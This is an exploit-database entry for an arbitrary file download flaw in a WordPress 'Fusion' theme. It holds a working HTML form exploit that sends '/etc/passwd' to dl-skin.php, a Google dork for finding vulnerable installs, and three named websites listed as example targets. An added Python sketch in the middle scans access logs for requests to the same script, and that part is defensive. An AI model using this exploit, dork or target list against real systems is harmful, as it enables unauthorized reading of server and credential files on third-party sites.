Wordpress Theme Fusion Arbitrary File Download Vulnerability

2014-06-20T00:00:00
ID 1337DAY-ID-22354
Type zdt
Reporter Aloulou
Modified 2014-06-20T00:00:00

Description

This exploit allows an attacker to download any writable file from the server.

#### Usage Info

Put the path of the file in the "File" field of the exploit, then click the "Download" button to get the file directly.

                                        
############################################################################
 
# Title : Wordpress Theme Fusion Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: [email protected]
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/fusion 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/fusion/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value="Download">
</form>
</body>
</html>
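
Detection sketch for the request shown above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the `dl-skin.php` path taken from the form action. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Script path taken from the form action on this page.
TARGET = "/wp-content/themes/fusion/lib/scripts/dl-skin.php"

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jun/2014:10:01:02 +0000] "POST /wp-content/themes/fusion/lib/scripts/dl-skin.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Jun/2014:10:01:09 +0000] "POST /wp-content/themes/fusion/lib//scripts/dl%2Dskin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Jun/2014:10:02:00 +0000] "GET /wp-content/themes/fusion/style.css HTTP/1.1" 200 9921 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [20/Jun/2014:10:03:30 +0000] "POST /blog/wp-content/themes/fusion/lib/scripts/dl-skin.php HTTP/1.1" 404 0 "-" "curl/7.30"',
]

def normalise(uri):
    """Drop the query string, decode %-escapes, collapse '//' and case-fold."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def find_hits(lines):
    """Return {client_ip: [(timestamp, method, status, size, served), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        # endswith() also covers WordPress installed in a subdirectory.
        if not m or not normalise(m["uri"]).endswith(TARGET):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        # The POST body (the requested file path) is not in an access log,
        # so a 200 POST with a non-empty response is the strongest signal here.
        served = m["method"] == "POST" and m["status"] == "200" and size > 0
        hits[m["ip"]].append((m["ts"], m["method"], int(m["status"]), size, served))
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in find_hits(SAMPLE_LOG).items():
        for ts, method, status, size, served in reqs:
            flag = "POSSIBLE FILE DISCLOSURE" if served else "probe"
            print(f"{ip} [{ts}] {method} {status} {size}B -> {flag}")
```

A hit marked as served means the script answered with content; which file was returned has to be established from other evidence, since the access log does not record the POST field.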



    
 
Examples:
http://brookeknollvillage.com
http://www.thegoldexperts.net
http://rdid.fr
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2018-01-05]  #